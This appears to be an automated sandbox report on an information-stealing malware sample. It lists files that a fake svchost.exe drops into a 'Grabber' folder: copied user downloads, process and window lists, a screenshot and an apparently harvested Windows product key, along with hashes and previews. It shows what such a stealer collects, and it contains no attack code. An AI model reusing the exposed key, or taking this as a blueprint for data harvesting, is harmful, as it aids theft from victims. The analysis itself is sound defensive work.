                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\PALRGUCVEH.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\PALRGUCVEH.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ZGGKNSUKOP.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6959554225029665
                                                  Encrypted:false
                                                  SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                  MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                  SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                  SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                  SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                  Malicious:false
                                                  Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):282
                                                  Entropy (8bit):3.5191090305155277
                                                  Encrypted:false
                                                  SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                  MD5:3A37312509712D4E12D27240137FF377
                                                  SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                  SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                  SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Camera Roll\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):190
                                                  Entropy (8bit):3.5497401529130053
                                                  Encrypted:false
                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                  MD5:D48FCE44E0F298E5DB52FD5894502727
                                                  SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                  SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                  SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Saved Pictures\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):190
                                                  Entropy (8bit):3.5497401529130053
                                                  Encrypted:false
                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                  MD5:87A524A2F34307C674DBA10708585A5E
                                                  SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                  SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                  SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):504
                                                  Entropy (8bit):3.514398793376306
                                                  Encrypted:false
                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                  MD5:29EAE335B77F438E05594D86A6CA22FF
                                                  SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                  SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                  SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\System\Process.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):20373
                                                  Entropy (8bit):5.758571071070943
                                                  Encrypted:false
                                                  SSDEEP:96:+ttrT2Zs9LaCwdMqO23KxcnBg+7UBG8nqACwKB6r8JbE9rfKYO+k2:+ttrT0sNa1dkig50LACwu6wJbE9ri2
                                                  MD5:5C1B87FDD31967C04E040AED31273A89
                                                  SHA1:2039C3C7B2268B858D1E3F8257373FA5B87E25EF
                                                  SHA-256:3296CFCF82A1702CACE1401375C8D71AE9F411B784A595497A3896DC301106B9
                                                  SHA-512:F541A6DE71EDAA99FCF9B8894CFF5B344771086FF423D90D1AB3E349FA4539445F0644AC1FA8B20FC532A2E620BF132CF568B6B54884BB11B4D5080D5BF97406
                                                  Malicious:false
                                                  Preview:NAME: sppsvc..PID: 6464..EXE: ..NAME: svchost..PID: 2152..EXE: C:\Windows\system32\svchost.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..PID: 4612..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: svchost..PID: 1716..EXE: C:\Users\user\AppData\Roaming\svchost.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..PID: 3008..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: Windows Security Health Service..PID: 6024..EXE: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe..NAME: csrss..PID: 420..EXE: ..NAME: backgroundTaskHost..PID: 4292..EXE: C:\Windows\system32\backgroundTaskHost.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..PID: 2136..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: svchost..PID: 5152..EXE: C:\Windows\system32\svchos

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\System\ProductKey.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):29
                                                  Entropy (8bit):3.935398667466764
                                                  Encrypted:false
                                                  SSDEEP:3:j9uyhIS+9m10D:BJZO
                                                  MD5:26091DB69F4A36FA295BE96E9040370F
                                                  SHA1:DFF23596F870E947521D853E896D92C88324FFE8
                                                  SHA-256:1D5640C0191BECDEADD9BE417100194CE6A028DCAC24979852A8FDC72CC7037A
                                                  SHA-512:8F4ED9781DDC5D787D575B3C854A0730671A78B438A59555F597FBB2869C2E2F264BB1B070358F9635A04F3488D3EE5A709651FAA95B4DD450464F5EC1C53FF3
                                                  Malicious:false
                                                  Preview:97XK9-N6YTD-7JJJ3-RCCP6-82GJ7

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\System\ScanningNetworks.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):84
                                                  Entropy (8bit):4.6630509827051725
                                                  Encrypted:false
                                                  SSDEEP:3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
                                                  MD5:58CD2334CFC77DB470202487D5034610
                                                  SHA1:61FA242465F53C9E64B3752FE76B2ADCCEB1F237
                                                  SHA-256:59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
                                                  SHA-512:C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
                                                  Malicious:false
                                                  Preview:Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\System\Windows.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):15168
                                                  Entropy (8bit):5.743427958844179
                                                  Encrypted:false
                                                  SSDEEP:48:BfERfEsfEYfEGfEXfELfEafEmfEsfEcfEMFfEOfEhfEIfE7fExfEVfEcfEpfEofD:8c9Kqt++h
                                                  MD5:8B231306977EBD952F46B82C046A7E99
                                                  SHA1:C6C7D2C3A5C7795DC4971CAA16CBD1907053DDB6
                                                  SHA-256:1968C4FC3ABED14EF916182DDD8472EA397596DA086AF0FCA9A894BA51CBD8B6
                                                  SHA-512:8A576849CCD143743380A2E2A44F58391A643589E985834D9A3A795A6E48AF229CB95B03C031F7F586F2D33503DB253552881820F827731FDD2533CCAA9FDF5E
                                                  Malicious:false
                                                  Preview:NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 4612..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 3008..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 2136..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 6424..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 5988..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmm

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\System\WorldWind.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                  Category:dropped
                                                  Size (bytes):96299
                                                  Entropy (8bit):7.851495961295097
                                                  Encrypted:false
                                                  SSDEEP:1536:COm0uT7hBWKeiJmfLtDFzUG0INKRCHVvTRaBKienvAHt3Tm2SmqdYak+OLS6:Xpti0PzTnNzHbikAHRTQBZX2
                                                  MD5:6AEF9BD3751EBB22DCE5F6772FC14C4E
                                                  SHA1:8B51AE657AA2453D2D676F1160D77C798335D986
                                                  SHA-256:E74D1F406B4F394B4CE27A9ED21B96B475B154A8D38E9CE3106C323CBEB6B117
                                                  SHA-512:DB643B5C4822D89948FC338901036F99B155259BDA8464C1B72BB593719672B5AC53E90DABC9C953B523944E123264A6103015893D887F7EC4B435225CB284BD
                                                  Malicious:false
                                                  Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-v.....Z..tN.Lo..?.Xb1....Oc....&...W.8.+.?.]._.....G.R....n..............z...........w..#.......`..

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BTC.exe.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\BTC.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):654
                                                  Entropy (8bit):5.380476433908377
                                                  Encrypted:false
                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                  Malicious:true
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Cracked.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\Cracked.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):1281
                                                  Entropy (8bit):5.370111951859942
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                  MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                  SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                  SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                  SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                  Malicious:true
